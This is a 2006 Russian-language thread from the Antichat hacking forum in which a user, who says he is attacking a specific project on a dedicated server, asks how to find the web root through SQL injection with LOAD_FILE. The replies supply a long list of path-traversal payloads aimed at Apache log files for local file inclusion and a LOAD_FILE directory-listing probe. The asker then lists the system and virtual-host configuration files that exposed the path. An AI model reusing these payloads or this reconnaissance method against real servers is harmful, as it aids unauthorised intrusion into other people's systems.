ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

путь к Document_root
  #1  
Старый 23.12.2006, 06:18
Аватар для LAMAREZ
LAMAREZ
Новичок
Регистрация: 16.01.2006
Сообщений: 24
Провел на форуме:
87233

Репутация: 63
По умолчанию путь к Document_root

блинк скуль есть с лоад файлом...
как разкрыть путь к DOCUMENT_ROOT?
/etc/httpd/conf/httpd.conf - безпонтово... никакой инфы по этому поводу...
 
Ответить с цитированием

  #2  
Старый 23.12.2006, 12:51
Аватар для blackybr
blackybr
♠ ♦ ♣ ♥
Регистрация: 18.05.2006
Сообщений: 1,828
Провел на форуме:
8042357

Репутация: 3742


Отправить сообщение для blackybr с помощью ICQ Отправить сообщение для blackybr с помощью AIM Отправить сообщение для blackybr с помощью Yahoo
По умолчанию

Гуглить на тему

ERROR site:microsoft.com
MYSQL site:microsoft.com

пробовал ?)

если есть доступ к конфигу, значит есть и локал инклуд? если да.. то логи, vhosts если есть или конфы различных панелек
Код:
../../../../../../../../../../../../var/log/httpd/access_log
../../../../../../../../../../../../var/log/httpd/error_log
../../../apache/logs/error.log
../../../apache/logs/access.log
../../../../apache/logs/error.log
../../../../apache/logs/access.log
../../../../../apache/logs/error.log
../../../../../apache/logs/access.log
../../../../../../apache/logs/error.log
../../../../../../apache/logs/access.log
../../../../../../../apache/logs/error.log
../../../../../../../apache/logs/access.log
../../../../../../../../apache/logs/error.log
../../../../../../../../apache/logs/access.log
../../../logs/error.log
../../../logs/access.log
../../../../logs/error.log
../../../../logs/access.log
../../../../../logs/error.log
../../../../../logs/access.log
../../../../../../logs/error.log
../../../../../../logs/access.log
../../../../../../../logs/error.log
../../../../../../../logs/access.log
../../../../../../../../logs/error.log
../../../../../../../../logs/access.log
../../../../../../../../../../../../etc/httpd/logs/acces_log
../../../../../../../../../../../../etc/httpd/logs/acces.log
../../../../../../../../../../../../etc/httpd/logs/error_log
../../../../../../../../../../../../etc/httpd/logs/error.log
../../../../../../../../../../../../var/www/logs/access_log
../../../../../../../../../../../../var/www/logs/access.log
../../../../../../../../../../../../usr/local/apache/logs/access_log
../../../../../../../../../../../../usr/local/apache/logs/access.log
../../../../../../../../../../../../var/log/apache/access_log
../../../../../../../../../../../../var/log/apache/access.log
../../../../../../../../../../../../var/log/access_log
../../../../../../../../../../../../var/www/logs/error_log
../../../../../../../../../../../../var/www/logs/error.log
../../../../../../../../../../../../usr/local/apache/logs/error_log
../../../../../../../../../../../../usr/local/apache/logs/error.log
../../../../../../../../../../../../var/log/apache/error_log
../../../../../../../../../../../../var/log/apache/error.log
../../../../../../../../../../../../var/log/access_log
../../../../../../../../../../../../var/log/error_log
и тд )
__________________
Привет! Меня зовут Джордж, и я хотел бы рассказать вам про реинкарнацию (ц) 2x2

Последний раз редактировалось blackybr; 23.12.2006 в 12:54..
 
Ответить с цитированием

  #3  
Старый 23.12.2006, 15:27
Аватар для guest3297
guest3297
Banned
Регистрация: 27.06.2006
Сообщений: 1,614
Провел на форуме:
3887520

Репутация: 2996


По умолчанию

Если вывод ошибок вообще выключен... то искать другие баги бесполезно... сойдет любой баг на раскрытие пути...потыркать на info.php php.php phpinfo.php и так далее посмотреть те сайты которые рядом найти багу на расурытие пути проанализировать применить в своем случаем искать конфиги... через лоад файл иногда работает листинг директорий.
LOAD_FILE(0x2f)
 
Ответить с цитированием

  #4  
Старый 23.12.2006, 17:29
Аватар для LAMAREZ
LAMAREZ
Новичок
Регистрация: 16.01.2006
Сообщений: 24
Провел на форуме:
87233

Репутация: 63
По умолчанию

нах ты эту гунь пишешь? ))
я про ../
Цитата:
/etc/httpd/logs/acces_log
/etc/httpd/logs/acces.log
/etc/httpd/logs/error_log
/etc/httpd/logs/error.log
/var/www/logs/access_log
/var/www/logs/access.log
/usr/local/apache/logs/access_log
/usr/local/apache/logs/access.log
/var/log/apache/access_log
/var/log/apache/access.log
/var/log/access_log
/var/www/logs/error_log
/var/www/logs/error.log
/usr/local/apache/logs/error_log
/usr/local/apache/logs/error.log
/var/log/apache/error_log
/var/log/apache/error.log
/var/log/access_log
/var/log/error_log
так написал бы и всё =\
 
Ответить с цитированием

  #5  
Старый 23.12.2006, 18:14
Аватар для zl0ba
zl0ba
Banned
Регистрация: 10.10.2006
Сообщений: 596
Провел на форуме:
2132613

Репутация: 1365


По умолчанию

Цитата:
Сообщение от [ cash ]  
посмотреть те сайты которые рядом найти багу на расурытие пути проанализировать применить в своем случаем искать конфиги...
Кэш правильно сказал и вот тебе к нагрузке http://www.domainsdb.net/ юзай!
 
Ответить с цитированием

  #6  
Старый 23.12.2006, 18:37
Аватар для LAMAREZ
LAMAREZ
Новичок
Регистрация: 16.01.2006
Сообщений: 24
Провел на форуме:
87233

Репутация: 63
По умолчанию

лол... ничего толком не помогли...
какой нах домайнсдб?
я ломаю конкретный проэкт на выделеном сервера, а вы мне про domainsdb сказки росказуете...
апач так настроен что ошибки не светит...
мне нада узанть путь через локальный инклуд... написал же чётко LOAD_FILE...
 
Ответить с цитированием

  #7  
Старый 23.12.2006, 18:46
Аватар для DIAgen
DIAgen
Познавший АНТИЧАТ
Регистрация: 02.05.2006
Сообщений: 1,191
Провел на форуме:
7364332

Репутация: 1276


По умолчанию

Цитата:
Сообщение от LAMAREZ  
лол... ничего толком не помогли...
какой нах домайнсдб?
я ломаю конкретный проэкт на выделеном сервера, а вы мне про domainsdb сказки росказуете...
апач так настроен что ошибки не светит...
мне нада узанть путь через локальный инклуд... написал же чётко LOAD_FILE...
Да не как ты не узнаешь, если только осталось в кэше www.google.com путь при отладки скриптов, а так обломись!
 
Ответить с цитированием

  #8  
Старый 23.12.2006, 22:11
Аватар для blackybr
blackybr
♠ ♦ ♣ ♥
Регистрация: 18.05.2006
Сообщений: 1,828
Провел на форуме:
8042357

Репутация: 3742


Отправить сообщение для blackybr с помощью ICQ Отправить сообщение для blackybr с помощью AIM Отправить сообщение для blackybr с помощью Yahoo
По умолчанию

Lamarez как собирал так и дал )))
__________________
Привет! Меня зовут Джордж, и я хотел бы рассказать вам про реинкарнацию (ц) 2x2
 
Ответить с цитированием

  #9  
Старый 24.12.2006, 05:57
Аватар для LAMAREZ
LAMAREZ
Новичок
Регистрация: 16.01.2006
Сообщений: 24
Провел на форуме:
87233

Репутация: 63
По умолчанию

хаха...
никто и не заикнулся про:
(вот как я добился истины)
1) /etc/rc.d/rc
2) /etc/rc.d/rc.local
3) /etc/mathopd/mathopd.conf
4) /var/run/httpd.pid
5) /etc/apache/conf/virtual-monster.conf - тут хосты
6) /etc/apache/conf/virtual.conf - и тут хосты

эх вы...))
как говорится "с миру по нитке..."
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Адриан Ламо: путь бездомного хакера Digimortal Статьи 12 16.11.2009 19:33
Как узнать серверный путь vbulletin 2.3.3? yanus Форумы 2 10.03.2006 16:51
Как в такой XSS указать путь к античтовскому снифферу? Vovec Уязвимости 11 02.03.2006 01:08
Albums: Атомы сознания, Третий путь, DOTS Family Fuckt #1 tclover Болталка 3 07.02.2006 01:19
Путь война!!! Китежанин Болталка 3 25.03.2005 06:12



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ